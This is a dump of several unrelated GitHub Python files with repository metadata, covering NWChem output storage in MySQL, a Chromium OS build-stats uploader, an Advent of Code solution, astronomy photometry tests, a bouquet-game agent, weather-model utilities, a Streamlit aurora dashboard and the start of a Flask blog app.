basatoms.append(new_atom)\n basefuncs.append(basisfun)\n\n n = nw_orbital(vector=orbital[0], E=float(orbital[1]), occ=float(orbital[7]))\n n.basisatoms = basatoms\n n.basisfuncs = basefuncs\n n.isHOMO = (orbital[5] == 1)\n n.isLUMO = (orbital[6] == 1)\n n.spin = float(orbital[8])\n cent = orbital[4].strip('][').split(' ')\n for i in range(len(cent)):\n cent[i] = float(cent[i])\n n.center = cent\n alpha[n.vector] = n\n return alpha\n\n def get_betaOrbital_info(self, connection):\n beta = dict()\n get = \"\"\" SELECT * FROM alpha_orbital; \"\"\"\n results = read_query(connection, get)\n for orbital in results:\n basatoms = []\n basefuncs = []\n for w in orbital[3].split(\") \"):\n basisfun = re.split(',\\s', w)\n basisfun[0] = float(basisfun[0].replace(\"(\", \"\"))\n basisfun[1] = float(basisfun[1].replace(\" \", \"\"))\n whitelist = set('abcdefghijklmnopqrstuvwxyz ABCDEFGHIJKLMNOPQRSTUVWXYZ')\n basisfun[3] = ''.join(filter(whitelist.__contains__, basisfun[3]))\n basisfun[3] = basisfun[3].strip()\n t = re.search(r'\\((.*?)\\)', basisfun[2]).group(1)\n t = t.split(\",\")\n new_atom = nw_atom(float(t[0]), t[1])\n basisfun[2] = new_atom\n basatoms.append(new_atom)\n basefuncs.append(basisfun)\n\n n = nw_orbital(vector=orbital[0], E=float(orbital[1]), occ=float(orbital[7]))\n n.basisatoms = 
basatoms\n n.basisfuncs = basefuncs\n n.isHOMO = (orbital[5] == 1)\n n.isLUMO = (orbital[6] == 1)\n n.spin = float(orbital[8])\n cent = orbital[4].strip('][').split(' ')\n for i in range(len(cent)):\n cent[i] = float(cent[i])\n n.center = cent\n beta[n.vector] = n\n return beta\n\n def get_overlap_info(self, connection):\n get = \"\"\" SELECT * FROM orbital_overlap \"\"\"\n results = read_query(connection, get)\n r = 1\n overlap = dict()\n for i in results:\n entry = dict()\n entry['alpha'] = i[0]\n entry['beta'] = i[1]\n entry['overlap'] = i[2]\n overlap[str(r)] = entry\n r += 1\n return overlap\n\n\n def get_orbital_info(self, connection):\n al = self.get_alphaOrbital_info(connection)\n be = self.get_betaOrbital_info(connection)\n\n return al, be\n\n\nclass database_storage():\n def __init__(self, fn, usr, pwd, db):\n self.usr = usr\n self.pwd = pwd\n self.fn = fn\n self.db = db\n #self.cp = cp\n que = \"\"\" CREATE DATABASE \"\"\" + str(db)\n nw = nwchem_parser(fn)\n server = create_server_connection(\"%\", usr, pwd)\n d = create_database(server, que)\n connection = create_db_connection(\"%\", usr, pwd, db)\n self.runinfo_storage(nw._runinfo, connection)\n self.totalDensity_storage(nw._total_density, connection)\n self.spinDensity_storage(nw._spin_density, connection)\n self.geometry_storage(nw._atom_dict, connection)\n self.alphaOrbital_storage(nw._orbital_dict_alpha, connection)\n self.betaOrbital_storage(nw._orbital_dict_beta, connection)\n self.orbitalOverlap_storage(nw._overlap_dict, connection)\n self.initialEnergy_storage(nw._energies, connection)\n self.gradient_storage(nw._gradient_dict, connection)\n\n def runinfo_storage(self, runinfo, connection):\n create_runinfo_table = \"\"\"\n CREATE TABLE run_info (\n prefix VARCHAR(20) PRIMARY KEY,\n date VARCHAR(30),\n nwchem_branch VARCHAR(20),\n nwchem_revision VARCHAR(20),\n ga_revision VARCHAR(20));\n \"\"\"\n execute_query(connection, create_runinfo_table)\n\n entry = (\n runinfo['prefix'], runinfo['date'], runinfo['NW_branch'], runinfo['NW_revision'], runinfo['GA_revision'])\n pop_entry = \"\"\" INSERT INTO run_info VALUES \"\"\" + str(entry)\n execute_query(connection, pop_entry)\n\n def geometry_storage(self, geoinfo, connection):\n create_geoinfo_table = \"\"\"\n CREATE TABLE geometry (\n atom_id FLOAT,\n species VARCHAR(5),\n charge FLOAT);\n \"\"\"\n execute_query(connection, create_geoinfo_table)\n\n entry = \"\"\" INSERT INTO geometry VALUES \"\"\"\n for ob in geoinfo:\n atom = geoinfo[ob]\n if (atom.id != 1):\n entry += \", \"\n e = (atom.id, atom.species, atom.charge)\n entry += str(e)\n entry += \";\"\n execute_query(connection, entry)\n\n def totalDensity_storage(self, totdeninfo, connection):\n create_totdeninfo_table = \"\"\"\n CREATE TABLE total_density_mulliken (\n id FLOAT,\n species VARCHAR(5),\n charge FLOAT,\n shell_charges VARCHAR(130));\n \"\"\"\n execute_query(connection, create_totdeninfo_table)\n\n entry = \"\"\" INSERT INTO total_density_mulliken VALUES \"\"\"\n for atom in totdeninfo['Mulliken Population Analysis']:\n if (atom.id != 1):\n entry += \", \"\n sh_ch = ' '.join(str(e) for e in atom.shell_charges)\n e = (atom.id, atom.species, atom.charge, sh_ch)\n entry += str(e)\n entry += \";\"\n execute_query(connection, entry)\n\n create_totdeninfo_table = \"\"\"\n CREATE TABLE total_density_lowdin (\n id FLOAT,\n species VARCHAR(5),\n charge FLOAT,\n shell_charges VARCHAR(130));\n \"\"\"\n execute_query(connection, create_totdeninfo_table)\n\n entry = \"\"\" INSERT INTO total_density_lowdin VALUES 
\"\"\"\n for atom in totdeninfo['Lowdin Population Analysis']:\n if (atom.id != 1):\n entry += \", \"\n sh_ch = ' '.join(str(e) for e in atom.shell_charges)\n e = (atom.id, atom.species, atom.charge, sh_ch)\n entry += str(e)\n entry += \";\"\n execute_query(connection, entry)\n\n def spinDensity_storage(self, spindeninfo, connection):\n create_spindeninfo_table = \"\"\"\n CREATE TABLE spin_density_mulliken (\n id FLOAT,\n species VARCHAR(5),\n charge FLOAT,\n shell_charges VARCHAR(130));\n \"\"\"\n execute_query(connection, create_spindeninfo_table)\n\n entry = \"\"\" INSERT INTO spin_density_mulliken VALUES \"\"\"\n for atom in spindeninfo['Mulliken Population Analysis']:\n if (atom.id != 1):\n entry += \", \"\n sh_ch = ' '.join(str(e) for e in atom.shell_charges)\n e = (atom.id, atom.species, atom.charge, sh_ch)\n entry += str(e)\n entry += \";\"\n execute_query(connection, entry)\n\n create_spindeninfo_table = \"\"\"\n CREATE TABLE spin_density_lowdin (\n id FLOAT,\n species VARCHAR(5),\n charge FLOAT,\n shell_charges VARCHAR(130));\n \"\"\"\n execute_query(connection, create_spindeninfo_table)\n\n entry = \"\"\" INSERT INTO spin_density_lowdin VALUES \"\"\"\n for atom in spindeninfo['Lowdin Population Analysis']:\n if (atom.id != 1):\n entry += \", \"\n sh_ch = ' '.join(str(e) for e in atom.shell_charges)\n e = (atom.id, atom.species, atom.charge, sh_ch)\n entry += str(e)\n entry += \";\"\n execute_query(connection, entry)\n\n def initialEnergy_storage(self, initialeninfo, connection):\n create_initialeninfo_table = \"\"\"\n CREATE TABLE initial_energy (\n total_energy FLOAT,\n 1e_energy FLOAT,\n 2e_energy FLOAT,\n HOMO FLOAT,\n LUMO FLOAT);\n \"\"\"\n execute_query(connection, create_initialeninfo_table)\n\n entry = (\n initialeninfo['total'], initialeninfo['1e'], initialeninfo['2e'], initialeninfo['HOMO'], initialeninfo['LUMO'])\n pop_entry = \"\"\" INSERT INTO initial_energy VALUES \"\"\" + str(entry) + \";\"\n execute_query(connection, pop_entry)\n\n def alphaOrbital_storage(self, orbitalinfo, connection):\n create_alphaoribital_table = \"\"\"\n CREATE TABLE alpha_orbital (\n vector FLOAT,\n energy FLOAT,\n basisAtom VARCHAR(200),\n basisFuncs VARCHAR(400),\n center VARCHAR(50),\n isHOMO BOOLEAN,\n isLUMO BOOLEAN,\n occupancy FLOAT,\n spin FLOAT);\n \"\"\"\n execute_query(connection, create_alphaoribital_table)\n\n entry = \"\"\" INSERT INTO alpha_orbital VALUES \"\"\"\n for orbit in orbitalinfo:\n if (orbit != 10):\n entry += \", \"\n org = orbitalinfo[orbit]\n basatom = ' '.join(str(i) for i in org.basisatoms)\n basfunc = ' '.join(str(i) for i in org.basisfuncs)\n cente = ' '.join(str(i) for i in org.center)\n e = (org.vector, org.E, basatom, basfunc, cente, org.isHOMO,\n org.isLUMO, org.occ, org.spin)\n entry += str(e)\n entry += \";\"\n\n execute_query(connection, entry)\n\n def betaOrbital_storage(self, orbitalinfo, connection):\n create_betaoribital_table = \"\"\"\n CREATE TABLE beta_orbital (\n vector FLOAT,\n energy FLOAT,\n basisAtom VARCHAR(200),\n basisFuncs VARCHAR(400),\n center VARCHAR(50),\n isHOMO BOOLEAN,\n isLUMO BOOLEAN,\n occupancy FLOAT,\n spin FLOAT);\n \"\"\"\n execute_query(connection, create_betaoribital_table)\n\n entry = \"\"\" INSERT INTO alpha_orbital VALUES \"\"\"\n for orbit in orbitalinfo:\n if (orbit != 10):\n entry += \", \"\n org = orbitalinfo[orbit]\n basatom = ' '.join(str(i) for i in org.basisatoms)\n basfunc = ' '.join(str(i) for i in org.basisfuncs)\n cente = ' '.join(str(i) for i in org.center)\n e = (org.vector, org.E, basatom, basfunc, 
cente, org.isHOMO,\n org.isLUMO, org.occ, org.spin)\n entry += str(e)\n entry += \";\"\n\n execute_query(connection, entry)\n\n def orbitalOverlap_storage(self, overlapinfo, connection):\n create_overlap_table = \"\"\"\n CREATE TABLE orbital_overlap (\n alpha FLOAT,\n beta FLOAT,\n overlap FLOAT);\n \"\"\"\n execute_query(connection, create_overlap_table)\n\n entry = \"\"\" INSERT INTO orbital_overlap VALUES \"\"\"\n for en in overlapinfo:\n thing = overlapinfo[en]\n entry += str((thing['alpha'], thing['beta'], thing['overlap']))\n if(float(en) < len(overlapinfo)):\n entry += \", \"\n entry += \";\"\n execute_query(connection, entry)\n\n def gradient_storage(self, grad_info, connection):\n create_gradient_table = \"\"\"\n CREATE TABLE gradient (\n )\n \"\"\"\n print(2)\n\n\ndef read_query(connection, query):\n cursor = connection.cursor()\n result = None\n try:\n cursor.execute(query)\n result = cursor.fetchall()\n return result\n except Error as err:\n print(f\"Error: '{err}'\")\n\ndef create_server_connection(host_name, user_name, user_password):\n connection = None\n try:\n connection = mysql.connector.connect(\n host=host_name,\n user=user_name,\n passwd=user_password\n )\n print(\"MySQL Database connection successful\")\n except Error as err:\n print(f\"Error: '{err}'\")\n\n return connection\n\ndef create_database(connection, query):\n cursor = connection.cursor()\n try:\n cursor.execute(query)\n print(\"Database created successfully\")\n except Error as err:\n print(f\"Error: '{err}'\")\n\n\ndef create_db_connection(host_name, user_name, user_password, db_name):\n connection = None\n try:\n connection = mysql.connector.connect(\n host=host_name,\n user=user_name,\n passwd=user_password,\n database=db_name\n )\n print(\"MySQL Database connection successful\")\n except Error as err:\n print(f\"Error: '{err}'\")\n\n return connection\n\ndef execute_query(connection, query):\n cursor = connection.cursor()\n try:\n cursor.execute(query)\n connection.commit()\n print(\"Query successful\")\n except Error as err:\n print(f\"Error: '{err}'\")\n","repo_name":"WiresinaBox/dft-seperation","sub_path":"Database.py","file_name":"Database.py","file_ext":"py","file_size_in_byte":19636,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"22682597720","text":"import logging\nimport re\nimport sys\n\nfrom chromite.buildbot import constants\nfrom chromite.lib import commandline\nfrom chromite.lib import cros_build_lib\nfrom chromite.lib import stats\n\n\nFILE_LOAD_ERROR = 'Error loading %s'\nUNCAUGHT_ERROR = 'Uncaught command stats exception.'\n\n\nclass LoadError(RuntimeError):\n \"\"\"Error during loading of stats file.\"\"\"\n\n\nclass StatsLoader(object):\n \"\"\"Loads stats from a file.\"\"\"\n\n @classmethod\n def LoadFile(cls, stat_file):\n \"\"\"Return a Stats object constructed from contents of |stat_file|.\"\"\"\n\n with open(stat_file, 'r') as f:\n first_line = f.readline().rstrip()\n match = re.match(r'Chromium OS .+ Version (\\d+)$', first_line)\n if not match:\n raise LoadError('Stats file not in expected format')\n\n version = int(match.group(1))\n loader = cls._GetLinesLoader(version)\n if not loader:\n raise LoadError('Stats file version %s not supported.' 
% version)\n\n return loader(f.readlines())\n\n @classmethod\n def _GetLinesLoader(cls, version):\n LOADERS = (\n None,\n cls._LoadLinesV1, # Version 1 loader (at index 1)\n )\n\n if version < len(LOADERS) and version >= 0:\n return LOADERS[version]\n\n return None\n\n @classmethod\n def _LoadLinesV1(cls, stat_lines):\n \"\"\"Load stat lines in Version 1 format.\"\"\"\n data = {}\n for line in stat_lines:\n # Each line has following format:\n # attribute_name Rest of line is value for attribute_name\n # Note that some attributes may have no value after their name.\n attr, _sep, value = line.rstrip().partition(' ')\n if not attr:\n attr = line.rstrip()\n\n data[attr] = value\n\n return stats.Stats(**data)\n\n\ndef main(argv):\n \"\"\"Main function.\"\"\"\n # This is not meant to be a user-friendly script. It takes one and\n # only one argument, which is a build stats file to be uploaded\n epilog = (\n 'This script is not intended to be run manually. It is used as'\n ' part of the build command statistics project.'\n )\n in_golo = cros_build_lib.GetHostDomain().endswith(constants.GOLO_DOMAIN)\n debug_level = commandline.ArgumentParser.DEFAULT_LOG_LEVEL\n if in_golo:\n debug_level = 'debug'\n parser = commandline.ArgumentParser(\n epilog=epilog, default_log_level=debug_level)\n parser.add_argument(\n 'build_stats_file', nargs=1, default=None)\n options = parser.parse_args(argv)\n\n try:\n cmd_stats = StatsLoader.LoadFile(options.build_stats_file[0])\n except LoadError:\n logging.error(FILE_LOAD_ERROR, options.build_stats_file[0],\n exc_info=True)\n sys.exit(1)\n\n try:\n stats.StatsUploader.Upload(cmd_stats)\n except Exception:\n logging.error(UNCAUGHT_ERROR, exc_info=True)\n sys.exit(1)\n","repo_name":"espadrine/opera","sub_path":"chromium/src/third_party/chromite/scripts/upload_command_stats.py","file_name":"upload_command_stats.py","file_ext":"py","file_size_in_byte":2730,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"48"} +{"seq_id":"71728439186","text":"\ndef read_input(file_name):\n file = open(file_name, 'r')\n depart_time = int(file.readline().strip())\n id_string = file.readline().strip().split(',')\n bus_ids = []\n for r_id in id_string:\n bus_ids.append(r_id)\n return depart_time, bus_ids\n\n\ndef part1(latest_depart, buses):\n min_bus = (0, 1000000000)\n for b_id in buses:\n if b_id == 'x':\n continue\n b_id = int(b_id)\n time_to_next_depart = b_id * ((latest_depart // b_id) + 1) - latest_depart\n if min_bus[1] > time_to_next_depart:\n min_bus = (b_id, time_to_next_depart)\n return min_bus[0] * min_bus[1]\n\n\ndef slow_part2(buses):\n first_id = int(buses[0])\n counter = first_id\n while True:\n w_count = counter + 1\n for i in range(1, len(buses)):\n if buses[i] == 'x':\n w_count += 1\n elif w_count % int(buses[i]) == 0:\n w_count += 1\n if i == len(buses) - 1:\n return counter\n else:\n break\n counter += first_id\n\n\ndef part2(buses):\n time = 0\n step = 1\n p2 = [(int(i), j) for j, i in enumerate(buses) if i != 'x']\n for bus_id, minutes in p2:\n while(time + minutes) % bus_id != 0:\n time += step\n step *= bus_id\n return time\n\n\ndef main():\n file_name = \"Part1Input.txt\"\n depart_time, bus_ids = read_input(file_name)\n print(part1(depart_time, bus_ids))\n print(part2(bus_ids))\n\n\nif __name__ == '__main__':\n 
main()\n","repo_name":"ZacharyRJohnson/Advent-of-Code","sub_path":"2020/Day13/day13.py","file_name":"day13.py","file_ext":"py","file_size_in_byte":1527,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"16928647224","text":"import numpy as np\nimport tgk.core\ntgk.core.configure()\n\nclass TestCometPhot:\n def test_centroid(self):\n import os\n from tgk import minions, core\n from tgk.science import Science\n\n frame = 'elp1m008-fl05-20170329-0170'\n fn = os.path.join(core.config['download path'],\n 'e91', '20170330',\n 'elp1m008-fl05-20170329-0170-e91.fits.fz')\n im, obs = Science.get_frame_data(frame, fn)\n geom = Science.get_geometry(frame, obs)\n\n m = minions.CometPhot(core.config, im, obs, geom)\n yxc, sep = m.centroid()\n \n yx0 = np.array([2222.7, 2103.0])\n d = np.sqrt(np.sum((yxc - yx0)**2))\n assert d < 0.5\n\n def test_photometry(self):\n import os\n from tgk import minions, core\n from tgk.science import Science\n\n frame = 'elp1m008-fl05-20170329-0170'\n fn = os.path.join(core.config['download path'],\n 'e91', '20170330',\n 'elp1m008-fl05-20170329-0170-e91.fits.fz')\n im, obs = Science.get_frame_data(frame, fn)\n geom = Science.get_geometry(frame, obs)\n\n im._hdu['sci'].data = 2 * np.ones_like(im.data)\n \n m = minions.CometPhot(core.config, im, obs, geom)\n bg = dict(bg=0, bgsig=0.5, bgarea=1000)\n area, flux, ferr = m.apphot([100, 100], 6, bg)\n \n assert np.isclose(area, 109)\n assert np.isclose(flux, 109 * 2 / obs.exptime.value)\n assert np.isclose(ferr, 15.75500714058867 / obs.exptime.value)\n","repo_name":"mkelley/41P-LCO","sub_path":"tests/minions/test_cometphot.py","file_name":"test_cometphot.py","file_ext":"py","file_size_in_byte":1579,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"70217857747","text":"from collections import Counter\nfrom typing import Dict\n\nimport numpy as np\n\nfrom constants import MAX_BOUQUET_SIZE\nfrom flowers import Bouquet, Flower, FlowerSizes, FlowerColors, FlowerTypes\nfrom utils import flatten_counter\nfrom suitors.base import BaseSuitor\n\n\nclass RandomSuitor(BaseSuitor):\n def __init__(self, days: int, num_suitors: int, suitor_id: int):\n \"\"\"\n :param days: number of days of courtship\n :param num_suitors: number of suitors, including yourself\n :param suitor_id: unique id of your suitor in range(num_suitors)\n \"\"\"\n super().__init__(days, num_suitors, suitor_id, name='rand')\n\n def _prepare_bouquet(self, remaining_flowers, recipient_id):\n num_remaining = sum(remaining_flowers.values())\n size = int(np.random.randint(0, min(MAX_BOUQUET_SIZE, num_remaining) + 1))\n if size > 0:\n chosen_flowers = np.random.choice(flatten_counter(remaining_flowers), size=(size, ), replace=False)\n chosen_flower_counts = dict(Counter(chosen_flowers))\n for k, v in chosen_flower_counts.items():\n remaining_flowers[k] -= v\n assert remaining_flowers[k] >= 0\n else:\n chosen_flower_counts = dict()\n chosen_bouquet = Bouquet(chosen_flower_counts)\n return self.suitor_id, recipient_id, chosen_bouquet\n\n def prepare_bouquets(self, flower_counts: Dict[Flower, int]):\n \"\"\"\n :param flower_counts: flowers and associated counts for for available flowers\n :return: list of tuples of (self.suitor_id, recipient_id, chosen_bouquet)\n the list should be of length len(self.num_suitors) - 1 because you should give a bouquet to everyone\n but yourself\n\n To get the list of suitor ids not including yourself, use the following 
snippet:\n\n        all_ids = np.arange(self.num_suitors)\n        recipient_ids = all_ids[all_ids != self.suitor_id]\n        \"\"\"\n        all_ids = np.arange(self.num_suitors)\n        recipient_ids = all_ids[all_ids != self.suitor_id]\n        remaining_flowers = flower_counts.copy()\n        return list(map(lambda recipient_id: self._prepare_bouquet(remaining_flowers, recipient_id), recipient_ids))\n\n    def zero_score_bouquet(self):\n        \"\"\"\n        :return: a Bouquet for which your scoring function will return 0\n        \"\"\"\n        min_flower = Flower(\n            size=FlowerSizes.Small,\n            color=FlowerColors.White,\n            type=FlowerTypes.Rose\n        )\n        return Bouquet({min_flower: 1})\n\n    def one_score_bouquet(self):\n        \"\"\"\n        :return: a Bouquet for which your scoring function will return 1\n        \"\"\"\n        max_flower = Flower(\n            size=FlowerSizes.Large,\n            color=FlowerColors.Blue,\n            type=FlowerTypes.Begonia\n        )\n        return Bouquet({max_flower: 1})\n\n    def score_types(self, types: Dict[FlowerTypes, int]):\n        \"\"\"\n        :param types: dictionary of flower types and their associated counts in the bouquet\n        :return: A score representing preference of the flower types in the bouquet\n        \"\"\"\n        if len(types) == 0:\n            return 0.0\n\n        avg_types = float(np.mean([x.value for x in flatten_counter(types)]))\n        return avg_types / (3 * (len(FlowerTypes) - 1))\n\n    def score_colors(self, colors: Dict[FlowerColors, int]):\n        \"\"\"\n        :param colors: dictionary of flower colors and their associated counts in the bouquet\n        :return: A score representing preference of the flower colors in the bouquet\n        \"\"\"\n        if len(colors) == 0:\n            return 0.0\n\n        avg_colors = float(np.mean([x.value for x in flatten_counter(colors)]))\n        return avg_colors / (3 * (len(FlowerColors) - 1))\n\n    def score_sizes(self, sizes: Dict[FlowerSizes, int]):\n        \"\"\"\n        :param sizes: dictionary of flower sizes and their associated counts in the bouquet\n        :return: A score representing preference of the flower sizes in the bouquet\n        \"\"\"\n        if len(sizes) == 0:\n            return 0\n\n        avg_sizes = float(np.mean([x.value for x in flatten_counter(sizes)]))\n        return avg_sizes / (3 * (len(FlowerSizes) - 1))\n\n    def receive_feedback(self, feedback):\n        \"\"\"\n        :param feedback:\n        :return: nothing\n        \"\"\"\n        \n        self.feedback.append(feedback)\n","repo_name":"griff4692/coms4444_flowers","sub_path":"suitors/random_suitor.py","file_name":"random_suitor.py","file_ext":"py","file_size_in_byte":4369,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"24615109863","text":"from sklearn.metrics import classification_report\nfrom joblib import dump, load\nfrom pathlib import Path\nimport streamlit as st\nimport pandas as pd\nimport json\n\nfrom utils.load_data import Dataload\ntable_city_climat_model = Path.cwd().parent / \"webapp\" / \"data\" / \"table_climat_city_model.csv\"\n\nPARAM_MODELS = Path.cwd().parent / \"webapp\" / \"models\" / \"models_params.json\"\npath_model = Path.cwd().parent / \"webapp\" / \"models\"\npath_df = Path.cwd().parent / \"webapp\" / \"data\" / \"data_features_webapp.csv\"\n\n\ndef instantiate_model(model_name):\n    # Load the parameters from the JSON file\n    with open(PARAM_MODELS, 'r') as f:\n        params = json.load(f)[model_name.__name__]\n\n    # Create a model with the specified parameters\n    model = model_name(**params)\n\n    # Return the model\n    return model\n\n\ndef train_model(model, dataset):\n    # Split the data into inputs and class labels\n    X_train, X_test, y_train, y_test = Dataload(dataset).split_data_train_test()\n    # Train the model\n    
model.fit(X_train, y_train)\n    # Return the trained model\n    print(\"Model trained\")\n    return model\n\n\ndef save_model(model):\n    # Save the trained model using joblib\n    model_name = model.__class__.__name__\n    model_filename = f\"{model_name.lower()}_model.joblib\"\n    dump(model, path_model / model_filename)\n    print(\"Model saved\")\n\n\ndef load_model(filename):\n    # Load the trained model from the file\n    model = load(filename)\n    print(\"Model loaded\")\n    return model\n\n\n# noinspection PyTypeChecker\ndef evaluate_model(model, dataset):\n    X_train, X_test, y_train, y_test = Dataload(dataset).split_data_train_test()\n    y_pred = model.predict(X_test)\n    accuracy = model.score(X_test, y_test)\n    report = classification_report(y_test, y_pred, output_dict=True)\n    print('Accuracy:', f'{accuracy*100:.2f} %')\n    f1_weighted = report['weighted avg'][\"f1-score\"]\n    print('F1-score (weighted):', f'{f1_weighted*100:.2f} %')\n    print(\"evaluate_model done\")\n    return accuracy, f1_weighted\n\n\ndef apply_model(model, dataset):\n    if dataset.columns.str.contains('raintomorrow').any():\n        dataset = dataset.drop(columns='raintomorrow', axis=1)\n    if dataset.columns.str.contains('date').any():\n        dataset = dataset.drop(columns='date', axis=1)\n    predictions = model.predict(dataset)\n    prediction_scores = model.predict_proba(dataset)\n    print(\"apply_model done\")\n    dataset['raintomorrow'] = predictions\n    return dataset\n\n\ndef display_scores(scores):\n    # Format the values as percentages in the dictionary\n    data = {\n        'Accuracy': [f'{scores[0]:.2%}'],\n        'F1-score (weighted)': [f'{scores[1]:.2%}']\n    }\n\n    # Create a DataFrame with the formatted scores\n    df_scores = pd.DataFrame(data)\n\n    # Exclude the index and center the columns\n    html_table = df_scores.to_html(index=False, justify='center')\n\n    # Display the HTML table\n    st.write(html_table, unsafe_allow_html=True)\n\n\ndef get_model(city_or_climate):\n    df_city_climat_model = Dataload(table_city_climat_model).load_df()\n    row = df_city_climat_model[df_city_climat_model[\"ville\"] == city_or_climate]\n    if row.empty:\n        row = df_city_climat_model[df_city_climat_model[\"climat\"] == city_or_climate]\n\n    # Check whether a match was found\n    if not row.empty:\n        model_file = row[\"modele\"].values[0]\n        # Load the model from the file\n        return model_file\n\n    # No match found\n    return None\n\ndef get_model_name(city_or_climate):\n    df_city_climat_model = Dataload(table_city_climat_model).load_df()\n    row = df_city_climat_model[df_city_climat_model[\"ville\"] == city_or_climate]\n    if row.empty:\n        row = df_city_climat_model[df_city_climat_model[\"climat\"] == city_or_climate]\n\n    # Check whether a match was found\n    if not row.empty:\n        model_name = row[\"climat\"].values[0]\n        # Load the model from the file\n        return model_name\n\n    # No match found\n    return None","repo_name":"WeatherForecasterTeam/australia_weather_forecasts","sub_path":"webapp/utils/load_and_apply_model.py","file_name":"load_and_apply_model.py","file_ext":"py","file_size_in_byte":4098,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"27570435175","text":"from dataclasses import dataclass\nimport streamlit as st\nimport pandas as pd\nfrom datetime import datetime\nimport numpy as np\nfrom statsmodels.graphics.tsaplots import plot_pacf, plot_acf\nimport matplotlib.pyplot as plt\n\nimport plotly.express as px\nfrom plotly.subplots import 
make_subplots\nimport plotly.graph_objects as go\n\nfrom data_scraper import DataScraper\n\n\n@dataclass\nclass DashBoard():\n    layout: str = \"centered\"\n\n    def __post_init__(self):\n        st.set_page_config(layout=self.layout)\n\n        self.load_data()\n        return\n\n    #@st.cache\n    def load_data(self):\n        data_scraper = DataScraper()\n        self.data = data_scraper.load_data()\n        self.raw_data = self.data.copy()\n\n    def generate_dashboard(self):\n        self.side_bar()\n        self.main_page()\n\n\n    def side_bar(self):\n        '''\n        Create side bar elements\n        '''\n\n        st.sidebar.markdown(\"## Sidebar\")\n\n        st.sidebar.markdown(\"#\")\n        self.resolution = st.sidebar.selectbox(label = 'Resolution', options=['YS','H', 'D','MS'], index=0)\n\n        # Download data\n        st.sidebar.download_button(label='Download data', key='download', data=self.convert_df(self.data), file_name='AuroraBorealis.csv', mime='text/csv')\n\n\n\n    def main_page(self):\n        '''\n        Create main page\n        '''\n\n        # self.title('Aurora Borealis', background_color='aquamarine')\n        st.markdown('# Aurora borealis')\n\n        self._preprocess_data()\n\n        st.markdown('#')\n        self._display_plot_timeseries()\n\n        self._display_plot_scatter()\n        self._display_plot_monthly_seasonality()\n        self._display_plot_yearly_acf_pacf()\n\n\n    def _preprocess_data(self):\n        '''Format data according to input params'''\n        self.data = self.data.resample(self.resolution).mean()\n\n\n    def _display_plot_timeseries(self):\n        '''\n        Plot timeseries Kp, Ap\n        '''\n\n        fig = make_subplots(rows=2, cols=1, subplot_titles=['Kp', 'Ap'], shared_xaxes=True)\n\n        fig.add_trace(\n            go.Scattergl(x=self.data.index, y=self.data['Kp'],\n                         mode='lines',\n                         name='Kp',\n                         line={'color': 'blue'}),\n            row=1, col=1\n        )\n\n        fig.add_trace(\n            go.Scattergl(x=self.data.index, y=self.data['ap'],\n                         mode='lines',\n                         name='Ap',\n                         line={'color': 'red'}),\n            row=2, col=1\n        )\n\n        # display\n        st.plotly_chart(fig, use_container_width=True)\n\n\n\n\n    def _display_plot_scatter(self):\n        '''Plot scatter Kp/Ap'''\n        fig = px.scatter(self.data, x='Kp', y='ap', title='Kp-Ap scatter')\n        st.plotly_chart(fig, use_container_width=True, render_mode='webgl')\n\n    def _display_plot_monthly_seasonality(self):\n        '''Plot monthly seasonality'''\n\n        data_month = self.raw_data.copy()\n        data_month['month'] = data_month.index.month\n        data_month = data_month.groupby('month').mean()\n\n        fig = make_subplots(specs=[[{'secondary_y': True}]], subplot_titles=['Monthly seasonality'])\n        fig.add_trace(\n            go.Scatter(x=data_month.index, y=data_month['Kp'], name='Kp', line={'color': 'blue'}),\n            secondary_y=False\n        )\n\n        fig.add_trace(\n            go.Scatter(x=data_month.index, y=data_month['ap'], name='Ap', line={'color': 'red'}),\n            secondary_y=True\n        )\n\n        # x axis label\n        fig.update_xaxes(title_text='Month')\n\n        # y axis label\n        fig.update_yaxes(title_text='Kp', secondary_y=False)\n        fig.update_yaxes(title_text='Ap', secondary_y=True)\n\n        # Render\n        st.plotly_chart(fig, use_container_width=True)\n\n\n    def _display_plot_yearly_acf_pacf(self):\n        '''Plot yearly ACF and PACF'''\n\n        data_year = self.raw_data.resample('Y').mean()\n\n        # Plot\n        fig, ax = plt.subplots(2, 1, sharex=True)\n        plot_pacf(x=data_year['Kp'], ax=ax[0])\n        ax[0].set_title('PACF Kp', fontweight='bold')\n        ax[0].grid(linestyle=':')\n\n        plot_acf(x=data_year['Kp'], ax=ax[1])\n        ax[1].set_title('ACF Kp', fontweight='bold')\n        ax[1].grid(linestyle=':')\n\n        # Render\n        st.pyplot(fig=fig)\n\n\n\n    def title(self, text: str, background_color: str = 'tomato', text_color: str = 'white') -> None:\n        st.markdown(f\"

{text}

\", unsafe_allow_html=True)\n\n @st.cache\n def convert_df(self, df: pd.DataFrame):\n return df.to_csv().encode('utf-8')\n\n\n\nif __name__ == '__main__':\n\n dashboard = DashBoard(layout = \"wide\")\n dashboard.generate_dashboard()\n\n","repo_name":"clarkmaio/AuroraBorealis","sub_path":"dashboard.py","file_name":"dashboard.py","file_ext":"py","file_size_in_byte":4711,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"26808320583","text":"\"\"\"Blogly application.\"\"\"\n\nfrom flask import Flask, render_template, redirect, url_for, flash, request;\nfrom flask_debugtoolbar import DebugToolbarExtension\nfrom models import db, connectDB, Users, Posts;\nfrom forms import UserForm, PostForm;\n\napp = Flask(__name__);\n\napp.config['SQLALCHEMY_DATABASE_URI'] = 'postgresql:///blogly'\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False;\napp.config['SQLALCHEMY_ECHO'] = True;\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False;\napp.config['SECRET_KEY'] = 'wtf';\n\napp.debug = True;\ntoolbar = DebugToolbarExtension(app);\n\napp.config['DEBUG_TB_INTERCEPT_REDIRECTS'] = False;\n\nconnectDB(app); # \ndb.create_all(); # create all relations/models associated with the db Instance, 